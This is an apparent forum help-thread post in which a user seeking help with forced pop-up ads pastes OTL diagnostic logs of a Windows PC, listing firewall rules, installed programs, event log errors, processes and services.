"{CAFB1352-EBDD-4C41-8F64-4B9CEA699B4F}" = protocol=6 | dir=in | app=c:\program files (x86)\mozilla firefox\firefox.exe |
"{CB29A369-30CE-46A5-9934-278594A971BB}" = protocol=6 | dir=in | app=c:\nexon\talesweaver\inphasenxd.exe |
"{CD460E5F-1B4F-4C07-B99D-5DF1F33B4F13}" = protocol=17 | dir=in | app=c:\programdata\nexonjp\ngm\ngm.exe |
"{CF427883-F6F5-4AAD-8F75-0F160842B0EA}" = dir=out | name=@{microsoft.windowscommunicationsapps_17.5.9600.20689_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowscommunicationsapps/resources/communicationspackagename} |
"{D1BA3E33-5488-462A-9C0C-4880B3F7CDBE}" = protocol=17 | dir=in | app=c:\windows\system32\arfc\wrtc.exe |
"{D6980480-941A-4DF6-AB81-3734ECD3D779}" = dir=out | name=junipernetworks.junospulsevpn |
"{D76D9E58-C01A-473F-A7CB-47785C4C2E82}" = protocol=6 | dir=in | app=c:\program files (x86)\maxthon3\bin\mxup.exe |
"{DB59588E-ED90-4C47-A7B5-7929DD0C0BD2}" = dir=out | name=checkpoint.vpn |
"{DBECC510-D1DD-454B-85CD-97313FBD73EB}" = dir=out | name=@{microsoft.bingsports_3.0.4.298_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingsports/resources/brandedapptitle} |
"{DCD48588-DEA0-4613-963F-BC8CC77C49BC}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\age2hd\launcher.exe |
"{DCD948A7-1D06-4871-9792-B2752D45583F}" = dir=out | name=check point vpn |
"{DF499B6B-9406-4233-B8CE-C13A3DFC521E}" = protocol=6 | dir=in | app=c:\program files (x86)\maxthon3\modules\mxminithunder\thundermini.exe |
"{E0D4F4A4-50DB-4E61-A9A6-97D2145A436B}" = protocol=17 | dir=in | app=c:\windows\system32\dmwu.exe |
"{E4C3F353-F3AD-497D-AE4C-2E0C296265E3}" = protocol=6 | dir=in | app=c:\hangame\japanese\goldwing\game.exe |
"{E6A917C9-2D7C-44DA-ADC3-F27BAC54466A}" = protocol=6 | dir=in | app=c:\windows\system32\dmwu.exe |
"{E6B916CF-2E4B-4E04-A2D0-24AF907AFED6}" = protocol=6 | dir=in | app=c:\users\ryota\downloads\utorrent.exe |
"{E7985E1D-C36F-4787-80A8-6350D07E9266}" = dir=in | name=@{c:\windows\winstore\resources.pri?ms-resource://winstore/resources/displayname} |
"{EC799E33-72BA-42D7-9127-DEFE68F9799D}" = dir=in | name=junipernetworks.junospulsevpn |
"{EFCF6019-F00D-46D9-9568-FC9EDD5193DE}" = dir=out | name=juniper networks junos pulse |
"{F0814EEE-9BD1-4B78-BA85-D63612A6227D}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steam.exe |
"{F1DFDFB7-40CA-48F0-8D06-BB59F49CC5A5}" = protocol=17 | dir=in | app=c:\nexon\suddenattack\suddenattack.exe |
"{F64300AD-D559-4000-BD45-0997BCC8E70A}" = dir=out | name=f5.vpn.client |
"{F6E9C483-518F-4BA7-BE4E-18648C6C864E}" = protocol=6 | dir=in | app=c:\nexon\suddenattack\suddenattack.exe |
"{F77E5446-4378-4E99-8B7A-7061AAAEA193}" = dir=in | name=f5.vpn.client |
"{FAD92456-5BB0-48C9-B2CB-9DBFF3B7D09B}" = dir=in | app=c:\users\ryota\appdata\local\microsoft\skydrive\skydrive.exe |
"{FAFE2CDC-A429-42D3-8523-6605AF848939}" = protocol=17 | dir=in | app=c:\hanpurple\dnest\dragonnest.exe |
"{FD921E2A-65D4-4167-AFA4-DC2516117E3B}" = dir=out | name=onenote |
"{FE80C7E8-BDE8-4A38-9DCD-19C3B3279627}" = protocol=17 | dir=in | app=c:\x-legend\genshin\game.bin |
"{FEC124A2-8A36-4429-B6E5-69606B431A45}" = dir=in | app=c:\program files (x86)\itunes\itunes.exe |
"{FEF57493-E3E4-46BE-B716-C6194636F110}" = dir=in | name=@{microsoft.windowscommunicationsapps_17.5.9600.20689_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowscommunicationsapps/resources/communicationspackagename} |
"TCP Query User{1B62F5B2-E035-4CAC-89D1-AB5CD5F2FA58}C:\program files (x86)\microsoft games\age of empires ii\age2_x1\age2_x1.icd" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft games\age of empires ii\age2_x1\age2_x1.icd |
"TCP Query User{5D33A37A-B027-42EB-A52A-F66CA11D904E}C:\users\ryota\desktop\bluff\bluff.exe" = protocol=6 | dir=in | app=c:\users\ryota\desktop\bluff\bluff.exe |
"TCP Query User{66DEA66C-65DC-401C-A8BC-D2C3958F5C25}C:\windows\downloaded program files\plauncher.exe" = protocol=6 | dir=in | app=c:\windows\downloaded program files\plauncher.exe |
"TCP Query User{B53C7C76-8A3C-46CD-AE85-FC73C4DB66D3}C:\program files (x86)\mozilla firefox\firefox.exe" = protocol=6 | dir=in | app=c:\program files (x86)\mozilla firefox\firefox.exe |
"TCP Query User{B91BCF46-2455-4390-9659-D1523BCF5883}C:\nexon\talesweaver\talesweaver.exe" = protocol=6 | dir=in | app=c:\nexon\talesweaver\talesweaver.exe |
"TCP Query User{C0B057B5-CB88-4A89-9643-0181FD4BFD9B}C:\hangame\arad\arad.exe" = protocol=6 | dir=in | app=c:\hangame\arad\arad.exe |
"UDP Query User{23E0F26C-D8BC-4DAA-B721-AF2C7FCF668E}C:\windows\downloaded program files\plauncher.exe" = protocol=17 | dir=in | app=c:\windows\downloaded program files\plauncher.exe |
"UDP Query User{275D5791-F993-4252-BDC3-BBA0D5741839}C:\nexon\talesweaver\talesweaver.exe" = protocol=17 | dir=in | app=c:\nexon\talesweaver\talesweaver.exe |
"UDP Query User{4EB623EB-C127-4E8D-8B88-D3E06BEAA1A9}C:\hangame\arad\arad.exe" = protocol=17 | dir=in | app=c:\hangame\arad\arad.exe |
"UDP Query User{556839B5-2CFB-450A-9B71-38C85B89F9F7}C:\program files (x86)\microsoft games\age of empires ii\age2_x1\age2_x1.icd" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft games\age of empires ii\age2_x1\age2_x1.icd |
"UDP Query User{DA29FC43-1442-49EB-B01F-F3A967F386E3}C:\program files (x86)\mozilla firefox\firefox.exe" = protocol=17 | dir=in | app=c:\program files (x86)\mozilla firefox\firefox.exe |
"UDP Query User{EEB81633-0C5D-4ECD-9A23-ACB55A76545A}C:\users\ryota\desktop\bluff\bluff.exe" = protocol=17 | dir=in | app=c:\users\ryota\desktop\bluff\bluff.exe |

[color=#E56717]========== HKEY_LOCAL_MACHINE Uninstall List ==========[/color]

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{1B2C85A0-2B9E-4291-8B37-468D57503E98}" = Update for Japanese Microsoft IME Postal Code Dictionary
"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" = Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219
"{2EDC2FA3-1F34-34E5-9085-588C9EFD1CC6}" = Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.60610
"{4DF9BC73-D405-4C3B-A0EA-1E390A8AFC73}" = Update for Japanese Microsoft IME Standard Dictionary
"{6A1E4EFB-3EE0-40A0-9D6D-E865370289DB}" = Google 日本語入力
"{764384C5-BCA9-307C-9AAC-FD443662686A}" = Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.60610
"{977D1ABF-4089-4CA7-BA33-CC75808B7ACE}" = Intel® Trusted Connect Service Client
"{B678797F-DF38-4556-8A31-8B818E261868}" = Apple Mobile Device Support
"{B939BFEB-824F-4456-A4EE-2B86ED04033D}" = Update for Japanese Microsoft IME Trending Words Dictionary
"{E9F0BCD8-6BD5-1ED7-EDA3-9FCF2A478AA1}" = Microsoft App Update for microsoft.windowscommunicationsapps_17.0.1119.516_x64__8wekyb3d8bbwe (x64)
"{F46AA0F1-E284-4878-A462-5F11B9166C0E}" = iTunes
"CCleaner" = CCleaner
"utvideo_is1" = Ut Video Codec Suite

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0659E943-DDF4-44FC-9FEE-A13B09F8BB08}" = Adobe Flash Media Live Encoder 3.2
"{111EE7DF-FC45-40C7-98A7-753AC46B12FB}" = QuickTime 7
"{15015752-9990-4516-A2B1-93823281FB8E}" = Update for Japanese Microsoft IME Postal Code Dictionary
"{20D4A895-748C-4D88-871C-FDB1695B0169}" = Platform
"{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}" = Skype(TM) 7.3
"{33F7A957-A66D-45A1-BADF-6576083B14E2}" = RPGツクール2000 ランタイムパッケージ
"{3CCC5A1C-3DDF-4126-B9DC-EDFC6A0E16A0}" = Hounds
"{3D6AD258-61EA-35F5-812C-B7A02152996E}" = Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.60610
"{402ED4A1-8F5B-387A-8688-997ABF58B8F2}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729
"{45A66726-69BC-466B-A7A4-12FCBA4883D7}" = HiJackThis
"{57383270-6F61-4DC8-A9B8-C1745FC29F38}" = USB PC Camera (SN9C102)
"{5982DE66-98C4-4351-AADB-61EC2CAE0B94}" = LightCapture
"{5A02FE73-5313-4467-8282-4974B6E333D4}" = MyBookEditor4
"{5AF4B3C4-C393-48D7-AC7E-8E7615579548}" = Adobe AIR
"{60E90BFF-5BE4-4DA9-9094-EC2C9AE6238E}" = モンスターハンター フロンティアG
"{65153EA5-8B6E-43B6-857B-C6E4FC25798A}" = Intel(R) Management Engine Components
"{6D1221A9-17BF-4EC0-81F2-27D30EC30701}" = Skype Click to Call
"{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable
"{78002155-F025-4070-85B3-7C0453561701}" = Apple Application Support
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{78CE66A9-85AF-4BD8-8FB7-35B5F3846C00}" = Update for Japanese Microsoft IME Standard Extended Dictionary
"{7DB71278-9AD7-4480-AB08-8649C5010B17}" = Update for Japanese Microsoft IME Standard Dictionary
"{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable
"{933B4015-4618-4716-A828-5289FC03165F}" = VC80CRTRedist - 8.0.50727.6195
"{95716cce-fc71-413f-8ad5-56c2892d4b3a}" = Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610
"{9864624D-FE15-422F-BDBB-5DC0D9AA904A}" = Gamepot Web実行環境
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9D646264-E17E-4E82-A7DF-CA59A9F10648}" = TuneUp Utilities Language Pack (ja-JP)
"{a1909659-0a08-4554-8af1-2175904903a1}" = Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610
"{A6057B4B-F75B-418A-8A26-C9F27859A150}" = 幻想神域
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{AC76BA86-7AD7-1041-7B44-AB0000000001}" = Adobe Reader XI (11.0.10) - Japanese
"{BF606435-86FF-43D3-97CB-65F6C6B9ACFA}" = ニコ生デスクトップキャプチャー(XP) SEASON2
"{E3D1594B-8077-42C9-8541-B8438F52F283}" = Niconico Live Encoder
"{E3F7F270-4ADD-3DA6-8B35-A924C134D49F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022
"{E7D4E834-93EB-351F-B8FB-82CDAE623003}" = Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.60610
"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219
"{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}" = Intel(R) Processor Graphics
"{F59AC46C-10C3-4023-882C-4212A92283B3}_is1" = Lagarith Lossless Codec (1.3.27)
"{F63BF3C0-D774-11D5-9241-444553540000}" = eo接続ツール
"{FCB3772C-B7D0-4933-B1A9-3707EBACC573}" = Intel(R) SDK for OpenCL - CPU Only Runtime Package
"Adobe AIR" = Adobe AIR
"Adobe Flash Player NPAPI" = Adobe Flash Player 17 NPAPI
"Age of Empires 2.0" = Microsoft Age of Empires II
"Age of Empires II: The Conquerors Expansion 1.0" = Microsoft Age of Empires II: The Conquerors Expansion
"AmaRecTV Live" = AmaRecTV Live
"AmvVideoCodec" = AmvVideoCodec
"ApplicationManager" = ApplicationManager 2011.4.27.209
"ArcheAge" = ArcheAge
"au Wi-Fi接続ツール" = au Wi-Fi接続ツール
"chorokuf" = ♪超録 - パソコン長時間録音機 フリーウェア版
"DAEMON Tools Lite" = DAEMON Tools Lite
"DC-Bass Source" = DC-Bass Source 1.3.0
"DivX Setup" = DivXセットアップ
"ffdshow_is1" = ffdshow v1.1.4399 [2012-03-22]
"Google Chrome" = Google Chrome
"herdProtectScan" = herdProtect Anti-Malware Scanner
"iFunbox_is1" = iFunbox (v2.94.2520.758), iFunbox DevTeam
"InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}" = VIA プラットフォーム・デバイス・マネージャ
"klive" = KDrive
"kliveaddin" = KDriveプラグイン
"LAME_is1" = LAME v3.99.3 (for Windows)
"Lhaplus" = Lhaplus
"LimeChat 2" = LimeChat 2
"LINE" = LINE
"Malwarebytes' Anti-Malware_is1" = Malwarebytes Anti-Malware バージョン 1.75.0.1300
"Mozilla Firefox 37.0.1 (x86 ja)" = Mozilla Firefox 37.0.1 (x86 ja)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"OpenSource Flash Video Splitter" = OpenSource Flash Video Splitter 1.0.0.5
"Pmang" = Pmangインストールマネージャー
"Pmang_archeage" = ArcheAge
"Pmang_common" = Common
"Pmang_tera" = TERA
"Project 64_is1" = Project 64 version 2.1.0.1
"RPGVXAce_RTP_is1" = RPGツクールVX Ace RTP
"SoundEngine Free" = SoundEngine Free
"Steam" = Steam
"Steam App 221380" = Age of Empires II: HD Edition
"SysInfo" = Creative システム インフォメーション
"TalesWeaver" = TalesWeaver
"vsfilter_is1" = DirectVobSub 2.40.4209
"つよきす3学期" = つよきす3学期

[color=#E56717]========== HKEY_USERS Uninstall List ==========[/color]

[HKEY_USERS\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"Hangame.com" = Hangame
"NeoplePlugin" = NeoplePlugin
"OneDriveSetup.exe" = Microsoft OneDrive
"俺たちに翼はないR" = 俺たちに翼はないR

[color=#E56717]========== Last 20 Event Log Errors ==========[/color]

[ Application Events ]
Error - 2015/04/18 5:56:35 | Computer Name = nametuki | Source = SideBySide | ID = 16842785
Description = "c:\program files (x86)\niwango\nicoliveenc\XSplitBroadcasterSrc.exe"
のアクティブ化コンテキストの生成に失敗しました。 従属アセンブリ Native.XSplitBroadcaster.exe,type="win32",version="1.0.0.0"
が見つかりませんでした。 詳細な診断を行うには sxstrace.exe を実行してください。

Error - 2015/04/18 6:41:59 | Computer Name = nametuki | Source = SideBySide | ID = 16842785
Description = "c:\program files (x86)\niwango\nicoliveenc\XSplitBroadcasterSrc.exe"
のアクティブ化コンテキストの生成に失敗しました。 従属アセンブリ Native.XSplitBroadcaster.exe,type="win32",version="1.0.0.0"
が見つかりませんでした。 詳細な診断を行うには sxstrace.exe を実行してください。

Error - 2015/04/18 6:51:23 | Computer Name = nametuki | Source = SideBySide | ID = 16842785
Description = "c:\program files (x86)\niwango\nicoliveenc\XSplitBroadcasterSrc.exe"
のアクティブ化コンテキストの生成に失敗しました。 従属アセンブリ Native.XSplitBroadcaster.exe,type="win32",version="1.0.0.0"
が見つかりませんでした。 詳細な診断を行うには sxstrace.exe を実行してください。

Error - 2015/04/18 8:19:12 | Computer Name = nametuki | Source = ESENT | ID = 215
Description = WinMail (2392) WindowsMail0: クライアントがインスタンスを中止したか、またはクライアントとの接続に失敗したため、バックアップを停止しました。

Error - 2015/04/19 8:46:26 | Computer Name = nametuki | Source = SideBySide | ID = 16842785
Description = "c:\program files (x86)\niwango\nicoliveenc\XSplitBroadcasterSrc.exe"
のアクティブ化コンテキストの生成に失敗しました。 従属アセンブリ Native.XSplitBroadcaster.exe,type="win32",version="1.0.0.0"
が見つかりませんでした。 詳細な診断を行うには sxstrace.exe を実行してください。

Error - 2015/04/19 18:45:13 | Computer Name = nametuki | Source = SideBySide | ID = 16842785
Description = "c:\program files (x86)\niwango\nicoliveenc\XSplitBroadcasterSrc.exe"
のアクティブ化コンテキストの生成に失敗しました。 従属アセンブリ Native.XSplitBroadcaster.exe,type="win32",version="1.0.0.0"
が見つかりませんでした。 詳細な診断を行うには sxstrace.exe を実行してください。

Error - 2015/04/19 22:13:43 | Computer Name = nametuki | Source = SideBySide | ID = 16842785
Description = "c:\program files (x86)\niwango\nicoliveenc\XSplitBroadcasterSrc.exe"
のアクティブ化コンテキストの生成に失敗しました。 従属アセンブリ Native.XSplitBroadcaster.exe,type="win32",version="1.0.0.0"
が見つかりませんでした。 詳細な診断を行うには sxstrace.exe を実行してください。

Error - 2015/04/20 9:03:50 | Computer Name = nametuki | Source = Application Error | ID = 1000
Description = 障害が発生しているアプリケーション名: herdProtectScan.exe、バージョン: 1.0.3.9、タイム スタンプ: 0x549300f9
障害が発生しているモジュール名:
LSASRV.dll、バージョン: 6.3.9600.17415、タイム スタンプ: 0x54504358 例外コード: 0xc0000005 障害オフセット:
0x000000000005036a 障害が発生しているプロセス ID: 0x8bc 障害が発生しているアプリケーションの開始時刻: 0x01d07b6a564bcd0f
障害が発生しているアプリケーション
パス: C:\Program Files\Reason\herdProtect\Scanner\herdProtectScan.exe 障害が発生しているモジュール
パス: C:\WINDOWS\SYSTEM32\LSASRV.dll レポート ID: afc9e3a0-e75d-11e4-bf32-eca86b234a79
障害が発生しているパッケージの完全な名前:
障害が発生しているパッケージに関連するアプリケーション ID:

Error - 2015/04/20 9:10:52 | Computer Name = nametuki | Source = Application Error | ID = 1000
Description = 障害が発生しているアプリケーション名: herdProtectScan.exe、バージョン: 1.0.3.9、タイム スタンプ: 0x549300f9
障害が発生しているモジュール名:
LSASRV.dll、バージョン: 6.3.9600.17415、タイム スタンプ: 0x54504358 例外コード: 0xc0000005 障害オフセット:
0x000000000005036a 障害が発生しているプロセス ID: 0xf34 障害が発生しているアプリケーションの開始時刻: 0x01d07b6b352d2fe2
障害が発生しているアプリケーション
パス: C:\Program Files\Reason\herdProtect\Scanner\herdProtectScan.exe 障害が発生しているモジュール
パス: C:\WINDOWS\SYSTEM32\LSASRV.dll レポート ID: ab411f5c-e75e-11e4-bf33-eca86b234a79
障害が発生しているパッケージの完全な名前:
障害が発生しているパッケージに関連するアプリケーション ID:

Error - 2015/04/20 10:46:19 | Computer Name = nametuki | Source = Application Error | ID = 1000
Description = 障害が発生しているアプリケーション名: herdProtectScan.exe、バージョン: 1.0.3.9、タイム スタンプ: 0x549300f9
障害が発生しているモジュール名:
LSASRV.dll、バージョン: 6.3.9600.17415、タイム スタンプ: 0x54504358 例外コード: 0xc0000005 障害オフセット:
0x000000000005036a 障害が発生しているプロセス ID: 0xf34 障害が発生しているアプリケーションの開始時刻: 0x01d07b6b352d2fe2
障害が発生しているアプリケーション
パス: C:\Program Files\Reason\herdProtect\Scanner\herdProtectScan.exe 障害が発生しているモジュール
パス: C:\WINDOWS\SYSTEM32\LSASRV.dll レポート ID: 010357d5-e76c-11e4-bf33-eca86b234a79
障害が発生しているパッケージの完全な名前:
障害が発生しているパッケージに関連するアプリケーション ID:

[ System Events ]
Error - 2015/04/20 12:45:25 | Computer Name = nametuki | Source = DCOM | ID = 10005
Description =

Error - 2015/04/20 12:47:02 | Computer Name = nametuki | Source = DCOM | ID = 10005
Description =

Error - 2015/04/20 12:47:12 | Computer Name = nametuki | Source = DCOM | ID = 10005
Description =

Error - 2015/04/20 12:54:11 | Computer Name = nametuki | Source = Service Control Manager | ID = 7001
Description = Network Location Awareness サービスは、次のエラーが原因で開始できなかった DHCP Client サービスに依存しています:
%%1068

Error - 2015/04/20 12:54:11 | Computer Name = nametuki | Source = Service Control Manager | ID = 7001
Description = Network List Service サービスは、次のエラーが原因で開始できなかった Network Location Awareness
サービスに依存しています: %%1068

Error - 2015/04/20 12:54:11 | Computer Name = nametuki | Source = DCOM | ID = 10005
Description =

Error - 2015/04/20 12:54:23 | Computer Name = nametuki | Source = DCOM | ID = 10005
Description =

Error - 2015/04/20 12:57:58 | Computer Name = nametuki | Source = DCOM | ID = 10005
Description =

Error - 2015/04/20 12:57:58 | Computer Name = nametuki | Source = DCOM | ID = 10005
Description =

Error - 2015/04/20 12:57:58 | Computer Name = nametuki | Source = DCOM | ID = 10005
Description =


< End of report >
  • かなは
  • 2015/04/21 (Tue) 20:13:44
Re: I'm having trouble with pop-ups and ads being forcibly displayed.
Next is the OTL log taken after the Firefox refresh.

OTL logfile created on: 2015/04/21 20:07:45 - Run 2
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\ryota\Desktop
64bit- An unknown product (Version = 6.2.9200) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17728)
Locale: 00000411 | Country: 日本 | Language: JPN | Date Format: yyyy/MM/dd

7.88 Gb Total Physical Memory | 3.44 Gb Available Physical Memory | 43.68% Memory free
9.13 Gb Paging File | 3.87 Gb Available in Paging File | 42.35% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 456.99 Gb Total Space | 35.38 Gb Free Space | 7.74% Space Free | Partition Type: NTFS
Drive F: | 105.28 Mb Total Space | 0.00 Mb Free Space | 0.00% Space Free | Partition Type: CDFS

Computer Name: NAMETUKI | User Name: ryota | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

[color=#E56717]========== Processes (SafeList) ==========[/color]

PRC - [2015/04/20 21:57:26 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ryota\Desktop\OTL.exe
PRC - [2015/02/10 23:04:06 | 002,357,248 | ---- | M] (i-Funbox.com) -- C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe
PRC - [2014/12/03 15:31:16 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2014/08/07 14:01:56 | 003,970,920 | ---- | M] (LINE Corporation) -- C:\Program Files (x86)\Naver\LINE\Line.exe
PRC - [2014/07/14 18:21:46 | 001,390,176 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
PRC - [2014/07/14 18:21:06 | 001,767,520 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
PRC - [2014/04/24 09:33:15 | 000,841,032 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
PRC - [2013/12/18 01:56:16 | 000,754,712 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
PRC - [2013/11/15 09:48:30 | 001,861,968 | ---- | M] () -- C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
PRC - [2013/04/04 14:50:32 | 000,701,512 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe
PRC - [2013/04/04 14:50:32 | 000,532,040 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe
PRC - [2013/04/04 14:50:32 | 000,418,376 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe
PRC - [2012/09/17 17:19:50 | 000,364,416 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
PRC - [2012/09/17 17:19:48 | 000,276,864 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
PRC - [2012/09/17 17:19:34 | 000,165,760 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
PRC - [2011/08/30 11:37:00 | 000,860,608 | ---- | M] (Kingsoft Corp. Ltd.) -- C:\Users\ryota\AppData\Roaming\ApplicationManager\bin\ApplicationManager.exe
PRC - [2007/09/05 14:38:28 | 000,174,624 | ---- | M] () -- C:\Program Files (x86)\Siemens\Common\TangoCoreService.exe


[color=#E56717]========== Modules (No Company Name) ==========[/color]

MOD - [2014/08/07 14:01:50 | 002,108,264 | ---- | M] () -- C:\Program Files (x86)\Naver\LINE\amp_window.dll
MOD - [2014/07/23 17:33:26 | 000,113,664 | ---- | M] () -- C:\Program Files (x86)\Naver\LINE\PlayerHelper.dll
MOD - [2014/04/24 09:33:13 | 000,390,472 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.131\ppgooglenaclpluginchrome.dll
MOD - [2014/04/24 09:33:12 | 013,692,232 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.131\PepperFlash\pepflashplayer.dll
MOD - [2014/04/24 09:33:10 | 004,081,480 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.131\pdf.dll
MOD - [2014/04/24 09:33:05 | 000,674,632 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.131\libglesv2.dll
MOD - [2014/04/24 09:33:04 | 000,093,000 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.131\libegl.dll
MOD - [2014/04/24 09:33:03 | 001,647,432 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.131\ffmpegsumo.dll
MOD - [2014/04/24 09:33:01 | 000,065,352 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.131\chrome_elf.dll
MOD - [2014/02/12 20:58:32 | 000,073,544 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2014/02/12 20:58:10 | 001,044,808 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2014/02/12 20:58:10 | 000,237,384 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll
MOD - [2013/11/15 09:49:56 | 000,100,688 | ---- | M] () -- C:\Program Files (x86)\DivX\DivX Update\DivXUpdateCheck.dll
MOD - [2013/11/15 09:48:30 | 001,861,968 | ---- | M] () -- C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
MOD - [2011/09/25 14:40:20 | 000,084,480 | ---- | M] () -- C:\Program Files (x86)\Consolas\NDC(XP)\DesktopCaptureXP.ax


[color=#E56717]========== Services (SafeList) ==========[/color]

SRV:[b]64bit:[/b] - [2015/02/21 08:49:18 | 000,780,800 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsm.dll -- (LSM)
SRV:[b]64bit:[/b] - [2015/02/04 08:58:28 | 000,366,520 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Program Files\Windows Defender\NisSrv.exe -- (WdNisSvc)
SRV:[b]64bit:[/b] - [2015/02/04 08:58:28 | 000,023,792 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend)
SRV:[b]64bit:[/b] - [2014/12/06 10:35:00 | 000,229,888 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\AudioEndpointBuilder.dll -- (AudioEndpointBuilder)
SRV:[b]64bit:[/b] - [2014/10/31 13:51:25 | 000,114,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:[b]64bit:[/b] - [2014/10/29 12:59:51 | 003,460,472 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\WSService.dll -- (WSService)
SRV:[b]64bit:[/b] - [2014/10/29 12:50:11 | 002,987,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV:[b]64bit:[/b] - [2014/10/29 11:42:19 | 000,026,112 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wephostsvc.dll -- (WEPHOSTSVC)
SRV:[b]64bit:[/b] - [2014/10/29 11:42:03 | 000,041,472 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\efssvc.dll -- (EFS)
SRV:[b]64bit:[/b] - [2014/10/29 11:34:51 | 000,067,584 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wiarpc.dll -- (WiaRpc)
SRV:[b]64bit:[/b] - [2014/10/29 11:33:55 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\svsvc.dll -- (svsvc)
SRV:[b]64bit:[/b] - [2014/10/29 11:29:22 | 000,121,856 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\fhsvc.dll -- (fhsvc)
